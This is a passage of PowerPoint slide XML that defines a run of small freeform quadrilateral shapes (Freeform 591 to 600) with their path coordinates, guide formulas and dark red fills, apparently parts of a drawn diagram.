                <a:gd name="T5" fmla="*/ 28 h 52"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 52"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 24 h 52"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 52"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 52 h 52"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="52">
                  <a:moveTo>
                    <a:pt x="34" y="24"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="52"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="24"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="600000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10542" name="Freeform 591"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3095"/>
              <a:ext cx="17" cy="38"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 10 h 38"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 38 h 38"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 27 h 38"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 38"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 10 h 38"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 38"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 38 h 38"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="38">
                  <a:moveTo>
                    <a:pt x="17" y="10"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="38"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="27"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="10"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10543" name="Freeform 592"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3257"/>
              <a:ext cx="11" cy="40"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 11 w 11"/>
                <a:gd name="T1" fmla="*/ 9 h 40"/>
                <a:gd name="T2" fmla="*/ 11 w 11"/>
                <a:gd name="T3" fmla="*/ 40 h 40"/>
                <a:gd name="T4" fmla="*/ 0 w 11"/>
                <a:gd name="T5" fmla="*/ 32 h 40"/>
                <a:gd name="T6" fmla="*/ 0 w 11"/>
                <a:gd name="T7" fmla="*/ 0 h 40"/>
                <a:gd name="T8" fmla="*/ 11 w 11"/>
                <a:gd name="T9" fmla="*/ 9 h 40"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 11"/>
                <a:gd name="T16" fmla="*/ 0 h 40"/>
                <a:gd name="T17" fmla="*/ 11 w 11"/>
                <a:gd name="T18" fmla="*/ 40 h 40"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="11" h="40">
                  <a:moveTo>
                    <a:pt x="11" y="9"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11" y="40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="32"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11" y="9"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10544" name="Freeform 593"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3229"/>
              <a:ext cx="35" cy="57"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 27 h 57"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 57 h 57"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 29 h 57"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 57"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 27 h 57"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 57"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 57 h 57"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="57">
                  <a:moveTo>
                    <a:pt x="35" y="27"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="57"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="29"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="27"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10545" name="Freeform 594"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="3201"/>
              <a:ext cx="35" cy="56"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 28 h 56"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 56 h 56"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 28 h 56"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 56"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 28 h 56"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 56"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 56 h 56"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="56">
                  <a:moveTo>
                    <a:pt x="35" y="28"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="28"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10546" name="Freeform 595"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2594" y="3172"/>
              <a:ext cx="34" cy="56"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 28 h 56"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 56 h 56"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 56"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 56"/>
                <a:gd name="T8" fmla="*/ 34 w 34"/>
                <a:gd name="T9" fmla="*/ 28 h 56"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 34"/>
                <a:gd name="T16" fmla="*/ 0 h 56"/>
                <a:gd name="T17" fmla="*/ 34 w 34"/>
                <a:gd name="T18" fmla="*/ 56 h 56"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="34" h="56">
                  <a:moveTo>
                    <a:pt x="34" y="28"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="34" y="56"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34" y="28"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10547" name="Freeform 596"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2575" y="3158"/>
              <a:ext cx="17" cy="41"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 17 w 17"/>
                <a:gd name="T1" fmla="*/ 13 h 41"/>
                <a:gd name="T2" fmla="*/ 17 w 17"/>
                <a:gd name="T3" fmla="*/ 41 h 41"/>
                <a:gd name="T4" fmla="*/ 0 w 17"/>
                <a:gd name="T5" fmla="*/ 25 h 41"/>
                <a:gd name="T6" fmla="*/ 0 w 17"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 17 w 17"/>
                <a:gd name="T9" fmla="*/ 13 h 41"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 17"/>
                <a:gd name="T16" fmla="*/ 0 h 41"/>
                <a:gd name="T17" fmla="*/ 17 w 17"/>
                <a:gd name="T18" fmla="*/ 41 h 41"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="17" h="41">
                  <a:moveTo>
                    <a:pt x="17" y="13"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="17" y="41"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17" y="13"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="400000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10548" name="Freeform 597"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2704" y="3332"/>
              <a:ext cx="12" cy="41"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 12 w 12"/>
                <a:gd name="T1" fmla="*/ 10 h 41"/>
                <a:gd name="T2" fmla="*/ 12 w 12"/>
                <a:gd name="T3" fmla="*/ 41 h 41"/>
                <a:gd name="T4" fmla="*/ 0 w 12"/>
                <a:gd name="T5" fmla="*/ 30 h 41"/>
                <a:gd name="T6" fmla="*/ 0 w 12"/>
                <a:gd name="T7" fmla="*/ 0 h 41"/>
                <a:gd name="T8" fmla="*/ 12 w 12"/>
                <a:gd name="T9" fmla="*/ 10 h 41"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 12"/>
                <a:gd name="T16" fmla="*/ 0 h 41"/>
                <a:gd name="T17" fmla="*/ 12 w 12"/>
                <a:gd name="T18" fmla="*/ 41 h 41"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="12" h="41">
                  <a:moveTo>
                    <a:pt x="12" y="10"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12" y="41"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12" y="10"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10549" name="Freeform 598"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2667" y="3300"/>
              <a:ext cx="35" cy="59"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 30 h 59"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 59 h 59"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 30 h 59"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 59"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 30 h 59"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 59"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 59 h 59"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="59">
                  <a:moveTo>
                    <a:pt x="35" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10550" name="Freeform 599"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2631" y="3269"/>
              <a:ext cx="35" cy="59"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 35 w 35"/>
                <a:gd name="T1" fmla="*/ 30 h 59"/>
                <a:gd name="T2" fmla="*/ 35 w 35"/>
                <a:gd name="T3" fmla="*/ 59 h 59"/>
                <a:gd name="T4" fmla="*/ 0 w 35"/>
                <a:gd name="T5" fmla="*/ 28 h 59"/>
                <a:gd name="T6" fmla="*/ 0 w 35"/>
                <a:gd name="T7" fmla="*/ 0 h 59"/>
                <a:gd name="T8" fmla="*/ 35 w 35"/>
                <a:gd name="T9" fmla="*/ 30 h 59"/>
                <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                <a:gd name="T15" fmla="*/ 0 w 35"/>
                <a:gd name="T16" fmla="*/ 0 h 59"/>
                <a:gd name="T17" fmla="*/ 35 w 35"/>
                <a:gd name="T18" fmla="*/ 59 h 59"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T10">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T11">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T12">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="T13">
                  <a:pos x="T6" y="T7"/>
                </a:cxn>
                <a:cxn ang="T14">
                  <a:pos x="T8" y="T9"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T15" t="T16" r="T17" b="T18"/>
              <a:pathLst>
                <a:path w="35" h="59">
                  <a:moveTo>
                    <a:pt x="35" y="30"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="35" y="59"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="28"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35" y="30"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="800000"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10551" name="Freeform 600"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2594" y="3237"/>
              <a:ext cx="34" cy="59"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 34 w 34"/>
                <a:gd name="T1" fmla="*/ 31 h 59"/>
                <a:gd name="T2" fmla="*/ 34 w 34"/>
                <a:gd name="T3" fmla="*/ 59 h 59"/>
                <a:gd name="T4" fmla="*/ 0 w 34"/>
                <a:gd name="T5" fmla="*/ 28 h 59"/>
                <a:gd name="T6" fmla="*/ 0 w 34"/>
                <a:gd name="T7" fmla="*/ 0 h 59"/>
